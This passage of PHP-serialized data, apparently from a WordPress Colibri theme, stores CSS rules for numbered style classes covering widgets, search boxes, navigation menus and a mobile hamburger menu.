#03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:157;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:158;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-158 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:159;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:160;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:161;a:3:{s:7:\"desktop\";s:104:\"#colibri .style-161 {\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:162;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:163;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:164;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:165;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:166;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:167;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-167 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:168;a:3:{s:7:\"desktop\";s:2355:\"#colibri .style-168 {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-168 .widget input:not([type=\"submit\"]) {\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  color: rgb(37, 41, 42);\n  border-top-width: 0px;\n  border-top-color: black;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-color: black;\n  border-left-style: none;\n}\n#colibri .style-168 .widget ul li a {\n  font-family: Open Sans;\n  font-weight: 400;\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-168 .widget ul li a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-168 .widget ul li a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-168 .widget ul li,#colibri .style-168 .widget ol li,#colibri .style-168 .widget  .textwidget p,#colibri .style-168 .widget  .calendar_wrap td ,#colibri .style-168  .widget  .calendar_wrap th ,#colibri .style-168  .widget  .calendar_wrap caption {\n  font-family: Open Sans;\n  font-weight: 400;\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(37, 41, 42);\n  padding-top: 4px;\n  padding-bottom: 4px;\n}\n#colibri .style-168 .widget ul,#colibri .style-168 .widget ol {\n  list-style-type: none;\n}\n#colibri .style-168 .widget h1,#colibri .style-168 .widget h2,#colibri .style-168 .widget h3,#colibri .style-168 .widget h4,#colibri .style-168 .widget h5,#colibri .style-168 .widget h6 {\n  font-family: Open Sans;\n  font-weight: 600;\n  font-size: 16px;\n  line-height: 1.6;\n  color: #17252a;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n  margin-bottom: 10px;\n}\n#colibri .style-168 .widget {\n  text-align: left;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n  margin-bottom: 20px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:54:\"#colibri .style-168 .widget {\n  text-align: center;\n}\n\";}i:169;a:3:{s:7:\"desktop\";s:3575:\"#colibri .style-168 .widget.widget_search button[type=\"submit\"] {\n  display: inline-block;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"] {\n  display: none;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"],#colibri .style-168 .widget.widget_search button[type=\"submit\"] {\n  background-color: rgb(249, 250, 251);\n  background-image: none;\n  font-size: 16px;\n  line-height: 1;\n  color: #17252a;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 0px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  width: auto;\n  padding-top: 10px;\n  padding-right: 12px;\n  padding-bottom: 10px;\n  padding-left: 12px;\n  margin-top: 0px;\n  margin-right: 0px;\n  margin-bottom: 0px;\n  margin-left: 0px;\n  transition-duration: 0.5s;\n  display: inline-block;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-168 .widget.widget_search button[type=\"submit\"]:hover {\n  color: #03a9f4;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-168 .widget.widget_search button[type=\"submit\"]:hover {\n  color: #03a9f4;\n}\n#colibri .style-168 .widget.widget_search input:not([type=\"submit\"])::placeholder {\n  color: rgb(37, 41, 42);\n}\n#colibri .style-168 .widget.widget_search input:not([type=\"submit\"]) {\n  padding-top: 10px;\n  padding-right: 12px;\n  padding-bottom: 10px;\n  padding-left: 12px;\n  font-size: 16px;\n  color: rgb(37, 41, 42);\n  background-color: rgb(249, 250, 251);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-color: rgb(222, 222, 222);\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 0px;\n  border-right-width: 0px;\n  border-right-color: rgb(222, 222, 222);\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(222, 222, 222);\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 0px;\n  border-left-width: 0px;\n  border-left-color: rgb(222, 222, 222);\n  border-left-style: none;\n  margin-top: 0px;\n  margin-right: 0px;\n  margin-bottom: 0px;\n  margin-left: 0px;\n}\n#colibri .style-168 .widget.widget_search h1,#colibri .style-168 .widget.widget_search h2,#colibri .style-168 .widget.widget_search h3,#colibri .style-168 .widget.widget_search h4,#colibri .style-168 .widget.widget_search h5,#colibri .style-168 .widget.widget_search h6 {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n  font-size: 16px;\n  color: #17252a;\n}\n#colibri .style-168 .widget.widget_search {\n  background-color: unset;\n  background-image: none;\n  border-top-width: 1px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 1px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 1px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n  padding-top: 0px;\n  padding-right: 0px;\n  padding-bottom: 0px;\n  padding-left: 0px;\n  margin-bottom: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:170;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:171;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:172;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:173;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:174;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:175;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:176;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:177;a:3:{s:7:\"desktop\";s:104:\"#colibri .style-177 {\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:178;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:179;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:180;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:181;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:182;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:183;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-183 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:184;a:3:{s:7:\"desktop\";s:2355:\"#colibri .style-184 {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-184 .widget input:not([type=\"submit\"]) {\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  color: rgb(37, 41, 42);\n  border-top-width: 0px;\n  border-top-color: black;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-color: black;\n  border-left-style: none;\n}\n#colibri .style-184 .widget ul li a {\n  font-family: Open Sans;\n  font-weight: 400;\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-184 .widget ul li a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-184 .widget ul li a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-184 .widget ul li,#colibri .style-184 .widget ol li,#colibri .style-184 .widget  .textwidget p,#colibri .style-184 .widget  .calendar_wrap td ,#colibri .style-184  .widget  .calendar_wrap th ,#colibri .style-184  .widget  .calendar_wrap caption {\n  font-family: Open Sans;\n  font-weight: 400;\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(37, 41, 42);\n  padding-top: 4px;\n  padding-bottom: 4px;\n}\n#colibri .style-184 .widget ul,#colibri .style-184 .widget ol {\n  list-style-type: none;\n}\n#colibri .style-184 .widget h1,#colibri .style-184 .widget h2,#colibri .style-184 .widget h3,#colibri .style-184 .widget h4,#colibri .style-184 .widget h5,#colibri .style-184 .widget h6 {\n  font-family: Open Sans;\n  font-weight: 600;\n  font-size: 16px;\n  line-height: 1.6;\n  color: #17252a;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n  margin-bottom: 10px;\n}\n#colibri .style-184 .widget {\n  text-align: left;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n  margin-bottom: 20px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:54:\"#colibri .style-184 .widget {\n  text-align: center;\n}\n\";}i:185;a:3:{s:7:\"desktop\";s:3575:\"#colibri .style-184 .widget.widget_search button[type=\"submit\"] {\n  display: inline-block;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"] {\n  display: none;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"],#colibri .style-184 .widget.widget_search button[type=\"submit\"] {\n  background-color: rgb(249, 250, 251);\n  background-image: none;\n  font-size: 16px;\n  line-height: 1;\n  color: #17252a;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 0px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  width: auto;\n  padding-top: 10px;\n  padding-right: 12px;\n  padding-bottom: 10px;\n  padding-left: 12px;\n  margin-top: 0px;\n  margin-right: 0px;\n  margin-bottom: 0px;\n  margin-left: 0px;\n  transition-duration: 0.5s;\n  display: inline-block;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-184 .widget.widget_search button[type=\"submit\"]:hover {\n  color: #03a9f4;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-184 .widget.widget_search button[type=\"submit\"]:hover {\n  color: #03a9f4;\n}\n#colibri .style-184 .widget.widget_search input:not([type=\"submit\"])::placeholder {\n  color: rgb(37, 41, 42);\n}\n#colibri .style-184 .widget.widget_search input:not([type=\"submit\"]) {\n  padding-top: 10px;\n  padding-right: 12px;\n  padding-bottom: 10px;\n  padding-left: 12px;\n  font-size: 16px;\n  color: rgb(37, 41, 42);\n  background-color: rgb(249, 250, 251);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-color: rgb(222, 222, 222);\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 0px;\n  border-right-width: 0px;\n  border-right-color: rgb(222, 222, 222);\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(222, 222, 222);\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 0px;\n  border-left-width: 0px;\n  border-left-color: rgb(222, 222, 222);\n  border-left-style: none;\n  margin-top: 0px;\n  margin-right: 0px;\n  margin-bottom: 0px;\n  margin-left: 0px;\n}\n#colibri .style-184 .widget.widget_search h1,#colibri .style-184 .widget.widget_search h2,#colibri .style-184 .widget.widget_search h3,#colibri .style-184 .widget.widget_search h4,#colibri .style-184 .widget.widget_search h5,#colibri .style-184 .widget.widget_search h6 {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n  font-size: 16px;\n  color: #17252a;\n}\n#colibri .style-184 .widget.widget_search {\n  background-color: unset;\n  background-image: none;\n  border-top-width: 1px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 1px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 1px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n  padding-top: 0px;\n  padding-right: 0px;\n  padding-bottom: 0px;\n  padding-left: 0px;\n  margin-bottom: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:186;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:187;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:188;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:189;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:190;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:191;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:192;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:193;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:194;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:195;a:3:{s:7:\"desktop\";s:385:\"#colibri .style-195 {\n  animation-duration: 0.5s;\n  padding-top: 20px;\n  padding-bottom: 20px;\n  background-color: #ffffff;\n  background-image: none;\n}\n#colibri .h-navigation_sticky .style-195,#colibri .h-navigation_sticky.style-195 {\n  background-color: #ffffff;\n  background-image: none;\n  padding-top: 10px;\n  padding-bottom: 10px;\n  box-shadow: 0px 0px 4px 0px rgba(0,0,0,0.5) ;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:195:\"#colibri .style-195 {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n#colibri .h-navigation_sticky .style-195,#colibri .h-navigation_sticky.style-195 {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";}i:196;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:197;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-197 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:198;a:3:{s:7:\"desktop\";s:505:\"#colibri .style-198-image {\n  max-height: 70px;\n}\n#colibri .style-198 a,#colibri .style-198  .logo-text {\n  color: #ffffff;\n  text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-198-image,#colibri .h-navigation_sticky.style-198-image {\n  max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-198 a,#colibri .h-navigation_sticky .style-198  .logo-text,#colibri .h-navigation_sticky.style-198 a,#colibri .h-navigation_sticky.style-198  .logo-text {\n  color: #000000;\n  text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:199;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-199 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:200;a:3:{s:7:\"desktop\";s:40:\"#colibri .style-200 {\n  height: 50px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:201;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-201 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:202;a:3:{s:7:\"desktop\";s:8600:\"#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a > svg,#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a >  .arrow-wrapper {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu  li > a > svg,#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu  li > a >  .arrow-wrapper {\n  padding-right: 5px;\n  padding-left: 5px;\n  color: black;\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n  padding-right: 5px;\n  padding-left: 5px;\n  color: black;\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu > li > ul::before {\n  height: 0px;\n  width: 100% ;\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu > li > ul {\n  margin-top: 0px;\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu.solid-active-item > li::after,#colibri .style-202 \n      ul.colibri-menu.solid-active-item > li::before {\n  background-color: white;\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 0%;\n  border-top-right-radius: 0%;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0%;\n  border-bottom-right-radius: 0%;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .style-202 \n      ul.colibri-menu.bordered-active-item > li::before {\n  background-color: #03a9f4;\n  background-image: none;\n  height: 3px;\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n  font-size: 14px;\n  color: rgb(37, 41, 42);\n}\n#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover  > a {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover > a,#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover  > a {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: rgb(255, 255, 255);\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li {\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgba(128,128,128,.2);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: none;\n  background-color: rgb(255, 255, 255);\n  background-image: none;\n}\n#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n  background-color: #03a9f4;\n}\n#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover,#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n  background-color: #03a9f4;\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item,#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover {\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgba(128,128,128,.2);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: none;\n  background-color: #03a9f4;\n  background-image: none;\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu li > ul {\n  background-color: #ffffff;\n  background-image: none;\n  margin-right: 5px;\n  margin-left: 5px;\n  box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.04) ;\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1.5em;\n  letter-spacing: 0px;\n  color: rgb(2, 110, 159);\n}\n#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #03a9f4;\n}\n#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #03a9f4;\n}\n#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1.5em;\n  letter-spacing: 0px;\n  color: #03a9f4;\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu > li {\n  margin-top: 0px;\n  margin-right: 20px;\n  margin-bottom: 0px;\n  margin-left: 20px;\n  padding-top: 10px;\n  padding-right: 0px;\n  padding-bottom: 10px;\n  padding-left: 0px;\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item,#colibri .style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover {\n  margin-top: 0px;\n  margin-right: 20px;\n  margin-bottom: 0px;\n  margin-left: 20px;\n  padding-top: 10px;\n  padding-right: 0px;\n  padding-bottom: 10px;\n  padding-left: 0px;\n}\n#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu {\n  justify-content: flex-end;\n}\n#colibri .h-navigation_sticky .style-202 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky .style-202 \n      ul.colibri-menu.bordered-active-item > li::before,#colibri .h-navigation_sticky.style-202 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky.style-202 \n      ul.colibri-menu.bordered-active-item > li::before {\n  background-color: #03a9f4;\n  background-image: none;\n}\n#colibri .h-navigation_sticky .style-202 >  div > .colibri-menu-container > ul.colibri-menu > li > a,#colibri .h-navigation_sticky.style-202 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  color: rgb(2, 110, 159);\n}\n#colibri .h-navigation_sticky .style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a,#colibri .h-navigation_sticky.style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-202  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky .style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a,#colibri .h-navigation_sticky.style-202  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky.style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky .style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover,#colibri .h-navigation_sticky.style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky.style-202  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:102:\"#colibri .style-202 >  div > .colibri-menu-container > ul.colibri-menu {\n  justify-content: center;\n}\n\";}i:203;a:3:{s:7:\"desktop\";s:931:\"#colibri .style-203-offscreen {\n  background-color: #222B34;\n  background-image: none;\n  width: 300px !important;\n}\n#colibri .style-203-offscreenOverlay {\n  background-color: rgba(0,0,0,0.5);\n  background-image: none;\n}\n#colibri .style-203  .h-hamburger-icon {\n  background-color: rgba(0, 0, 0, 0.1);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-color: black;\n  border-top-style: solid;\n  border-top-left-radius: 100%;\n  border-top-right-radius: 100%;\n  border-right-width: 0px;\n  border-right-color: black;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: black;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 100%;\n  border-bottom-right-radius: 100%;\n  border-left-width: 0px;\n  border-left-color: black;\n  border-left-style: solid;\n  fill: white;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n  width: 24px;\n  height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:204;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:205;a:3:{s:7:\"desktop\";s:3947:\"#colibri .style-205 >  div > .colibri-menu-container > 